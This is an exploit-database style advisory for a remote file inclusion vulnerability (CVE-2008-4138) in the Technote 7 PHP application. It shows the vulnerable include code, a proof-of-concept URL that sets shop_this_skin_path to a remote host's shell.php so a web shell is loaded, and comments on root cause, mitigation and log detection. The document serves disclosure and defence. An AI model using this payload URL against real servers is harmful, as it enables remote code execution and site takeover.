Technote 7 - 'shop_this_skin_path' Remote File Inclusion

Author: webDEViL
type: webapps
platform: php
port: 
date_added: 2008-09-16  
date_updated: 2016-12-22  
verified: 1  
codes: OSVDB-48166;CVE-2008-4138  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 6478.txt  
#-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------#
#-----------Technote 7 Remote File Inclusion------------------------#
# ----------developers site: http://www.technote.co.kr--------------#

bash-3.1# cat technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php

...snip...
$TWIN_SET['dir_path']= "$shop_this_skin_path/3_plugin_twindow/skin_gray";
...snip...
include_once "$TWIN_SET[dir_path]/frame_design.php";

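# Root cause: the excerpt above builds the include path from $shop_this_skin_path with no
# validation, and the request below supplies that variable as a query parameter
# (presumably via register_globals -- the snipped code is not shown, so confirm it is never
# assigned server-side).
# Fix/mitigation: set the skin path from a server-side constant or an allow-list rather than
# from request data, and keep register_globals and allow_url_include disabled.
# Detection: in web server logs, look for a shop_this_skin_path parameter whose value
# contains a URL scheme (http://, ftp://, ...).

http://site/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ip.a.dd.r/shell.php?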

# milw0rm.com [2008-09-17]